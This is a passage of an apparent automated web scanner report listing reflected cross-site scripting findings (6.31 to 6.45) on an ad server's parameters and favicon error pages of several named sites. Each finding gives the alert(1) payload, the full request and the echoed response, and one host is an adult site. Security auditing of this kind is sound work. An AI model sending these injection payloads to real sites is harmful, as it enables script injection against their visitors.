6.31. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb019"%3balert(1)//b65de132d16 was submitted in the cwadformat parameter. This input was echoed as eb019";alert(1)//b65de132d16 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250eb019"%3balert(1)//b65de132d16&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB24
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5781
Date: Tue, 03 May 2011 15:41:33 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:33 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417";var cf="300X250eb019";alert(1)//b65de132d16";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var
...[SNIP]...

6.32. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e6c6"%3balert(1)//02ff7aa62ef was submitted in the cwheight parameter. This input was echoed as 9e6c6";alert(1)//02ff7aa62ef in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=2509e6c6"%3balert(1)//02ff7aa62ef&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP200
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Fri, 29 Apr 02011 17:42:46 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
Content-Length: 5826
Date: Tue, 03 May 2011 15:41:44 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:44 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 03-May-2011 18:28:24 GMT; Path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="503597";var cwtagid="94417";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="2509e6c6";alert(1)//02ff7aa62ef";var cads="0";var cp="503597";var ct="94417";var cf="300X250";var cn="1";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=do
...[SNIP]...

6.33. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8bcb"%3balert(1)//0d2ab08f98b was submitted in the cwpid parameter. This input was echoed as f8bcb";alert(1)//0d2ab08f98b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597f8bcb"%3balert(1)//0d2ab08f98b&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
CW-Server: CW-APP118
Cache-Control: max-age=10000, public, must-revalidate
Last-Modified: Sat, 30 Apr 02011 11:53:36 EDT
Content-Type: application/x-javascript;charset=ISO-8859-1
Content-Length: 5854
Date: Tue, 03 May 2011 15:41:40 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:40 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 03-May-2011 18:28:20 GMT; Path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="503597f8bcb";alert(1)//0d2ab08f98b";var cwtagid="94417";var cwadformat="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cads="0";var cp="503597f8bcb";alert(1)//0d2ab08f98b";var ct="94417";var cf="300X250";var cn="1"
...[SNIP]...

6.34. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e73b3"%3balert(1)//a8ed0abca64 was submitted in the cwpnet parameter. This input was echoed as e73b3";alert(1)//a8ed0abca64 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1e73b3"%3balert(1)//a8ed0abca64&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB10
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5781
Date: Tue, 03 May 2011 15:41:46 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:46 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1e73b3";alert(1)//a8ed0abca64";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="undefined";var _cwn=naviga
...[SNIP]...

6.35. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eb99a"%3balert(1)//7f941fa397 was submitted in the cwrun parameter. This input was echoed as eb99a";alert(1)//7f941fa397 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200eb99a"%3balert(1)//7f941fa397&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB30
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5780
Date: Tue, 03 May 2011 15:41:33 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:31 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417";var cf="300X250";var ca="VIEWAD";var cr="200eb99a";alert(1)//7f941fa397";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window
...[SNIP]...

6.36. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0ee9"%3balert(1)//43dd5ee413a was submitted in the cwtagid parameter. This input was echoed as c0ee9";alert(1)//43dd5ee413a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=300&cwheight=250&cwpnet=1&cwtagid=94417c0ee9"%3balert(1)//43dd5ee413a HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB22
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5781
Date: Tue, 03 May 2011 15:41:47 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:47 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417c0ee9";alert(1)//43dd5ee413a";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="300";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var
...[SNIP]...

6.37. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44449"%3balert(1)//57b0f102807 was submitted in the cwwidth parameter. This input was echoed as 44449";alert(1)//57b0f102807 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=300X250&cwpid=503597&cwwidth=30044449"%3balert(1)//57b0f102807&cwheight=250&cwpnet=1&cwtagid=94417 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=1190;c=1;s=1;d=9;w=300;h=250;$=audiencescience300x250

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
CW-Server: CW-WEB29
Cache-Control: public, must-revalidate, max-age=1000
Last-Modified: Mon, 25 Apr 2011 16:56:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 5781
Date: Tue, 03 May 2011 15:41:41 GMT
Connection: close
Set-Cookie: C2W4=CT; expires=Tue, 31-May-2011 15:41:41 GMT; path=/; domain=.contextweb.com
Set-Cookie: cw=cw; domain=.contextweb.com; path=/
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

function cw_Process(){try{var cu="http://tag.contextweb.com/TagPublish/getad.aspx";var cp="503597";var ct="94417";var cf="300X250";var ca="VIEWAD";var cr="200";var cw="30044449";alert(1)//57b0f102807";var ch="250";var cn="1";var cads="0";String.prototype.cwcontains=function(s){return(this.toLowerCase().indexOf(s.toLowerCase())!= -1);};var _nxy=[-1,-1];var _cwd=document;var _cww=window;var _cwu="un
...[SNIP]...

6.38. http://www.610wtvn.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.610wtvn.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 735de"><script>alert(1)</script>53920edd13d was submitted in the REST URL parameter 1. This input was echoed as 735de\"><script>alert(1)</script>53920edd13d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico735de"><script>alert(1)</script>53920edd13d HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.610wtvn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 3790457961
X-Cache-Server: varnish02
Expires: Tue, 03 May 2011 11:40:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:40:37 GMT
Content-Length: 32669
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - News Talk 610 WTVN | Best Buckeye Coverage | Colu
...[SNIP]...
<meta property="og:url" content="http://www.610wtvn.com/favicon.ico735de\"><script>alert(1)</script>53920edd13d" />
...[SNIP]...

6.39. http://www.610wtvn.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.610wtvn.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff15d"><script>alert(1)</script>dfbba2ca5f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ff15d\"><script>alert(1)</script>dfbba2ca5f3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?ff15d"><script>alert(1)</script>dfbba2ca5f3=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.610wtvn.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 3395353806
X-Cache-Server: varnish01
Expires: Tue, 03 May 2011 11:40:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:40:31 GMT
Content-Length: 32672
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - News Talk 610 WTVN | Best Buckeye Coverage | Colu
...[SNIP]...
<meta property="og:url" content="http://www.610wtvn.com/favicon.ico?ff15d\"><script>alert(1)</script>dfbba2ca5f3=1" />
...[SNIP]...

6.40. http://www.alvinisd.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.alvinisd.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a5590<script>alert(1)</script>65d717db4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoa5590<script>alert(1)</script>65d717db4a HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alvinisd.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 10:46:02 GMT
Server: Apache/2.2.14 (Ubuntu)
Set-Cookie: PHPSESSID=c961f65a156b6343d4b963f71aff4a55; path=/
Expires: Wed, 26 Feb 1997 08:21:57 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 2796
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
   dir="ltr">
...[SNIP]...
<div style="font-style: italic; font-size: 90%;">favicon.icoa5590<script>alert(1)</script>65d717db4a</div>
...[SNIP]...

6.41. http://www.am570radio.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.am570radio.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85f60"><script>alert(1)</script>7472f3ccde was submitted in the REST URL parameter 1. This input was echoed as 85f60\"><script>alert(1)</script>7472f3ccde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico85f60"><script>alert(1)</script>7472f3ccde HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.am570radio.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 4192825522
X-Cache-Server: varnish03
Expires: Tue, 03 May 2011 11:24:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:24:43 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34497

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - AM 570 KLAC K-Los Angeles California/Orange Count
...[SNIP]...
<meta property="og:url" content="http://www.am570radio.com/favicon.ico85f60\"><script>alert(1)</script>7472f3ccde" />
...[SNIP]...

6.42. http://www.am570radio.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.am570radio.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3439b"><script>alert(1)</script>89da71ed857 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3439b\"><script>alert(1)</script>89da71ed857 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?3439b"><script>alert(1)</script>89da71ed857=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.am570radio.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
X-Varnish: 3790118289
X-Cache-Server: varnish02
Expires: Tue, 03 May 2011 11:24:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 11:24:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34505

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Page Not Found - AM 570 KLAC K-Los Angeles California/Orange Count
...[SNIP]...
<meta property="og:url" content="http://www.am570radio.com/favicon.ico?3439b\"><script>alert(1)</script>89da71ed857=1" />
...[SNIP]...

6.43. http://www.aquascapeonline.com/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aquascapeonline.com
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f2c5"><script>alert(1)</script>c2b8edb6758 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico?4f2c5"><script>alert(1)</script>c2b8edb6758=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.aquascapeonline.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:46:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
Content-Length: 20675
Content-Type: text/html
Set-Cookie: language=en; expires=Thu, 02-Jun-2011 10:46:24 GMT; path=/
Set-Cookie: CurrencyCode=USD; expires=Thu, 02-Jun-2011 10:46:24 GMT; path=/
Set-Cookie: Refer=; expires=Wed, 04-May-2011 10:46:24 GMT; path=/
Set-Cookie: s=%3A%3A; expires=Wed, 04-May-2011 10:46:24 GMT; path=/
Set-Cookie: ASPSESSIONIDCACTACRQ=OGGIAFJDLHFDAGACDGJDLKMD; path=/
Cache-control: private


<!-- ******************************************
       MAY NOT BE REMOVED

CandyPress Shopping Cart Version 3.3
http://www.candypress.com
Copyright 2005 by Shopping Tree, Inc.

       MAY NOT BE REM
...[SNIP]...
<form method="POST" action="http://www.aquascapeonline.com/custom404.asp?404;http://www.aquascapeonline.com:80/favicon.ico?4f2c5"><script>alert(1)</script>c2b8edb6758=1" name="LangChange">
...[SNIP]...

6.44. http://www.ashop.com.au/favicon.ico [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ashop.com.au
Path:   /favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9fc6"-alert(1)-"cc0bd250eb4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico?e9fc6"-alert(1)-"cc0bd250eb4=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ashop.com.au
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:36:32 GMT
Server: Microsoft-IIS/6.0
S: 1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: SD=32765249823E4A8A9C331D4F26B28A5C; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 933


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>

</title><script type="text/javascript">var TimeZone = 10;var Current_page_URL = "http://www.ashop.com.au/favicon.ico?e9fc6"-alert(1)-"cc0bd250eb4=1"; var mySiteID = 336; var hkey=""; var MachineCode = "QC8T6BQ7"</script>
...[SNIP]...

6.45. http://www.bigtitcreampie.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bigtitcreampie.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1534a"-alert(1)-"9a18ac6c6e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico1534a"-alert(1)-"9a18ac6c6e1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bigtitcreampie.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:31:39 GMT
Server: Apache
Set-Cookie: nomobile=0; path=/; domain=.bigtitcreampie.com; expires=Wed, 04-May-2011 07:31:39 GMT
Vary: Host,Accept-Encoding,User-Agent,Accept-Language
X-Powered-By: PHP/5.2.11-pl1-gentoo
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: psinfo=bbonet%7Cbigtitcreampie%7C1%7Cpps%7C%7C%7C%7C%7C%7C%7C%7C%7Cus; expires=Thu, 02-Jun-2011 11:31:39 GMT; path=/; domain=.bigtitcreampie.com
Set-Cookie: psextra=173.193.214.243%7COK%3B%7C; expires=Thu, 02-Jun-2011 11:31:39 GMT; path=/; domain=.bigtitcreampie.com
Cache-Control: max-age=900
Expires: Tue, 03 May 2011 11:46:39 GMT
Content-Type: text/html
Content-Length: 8703

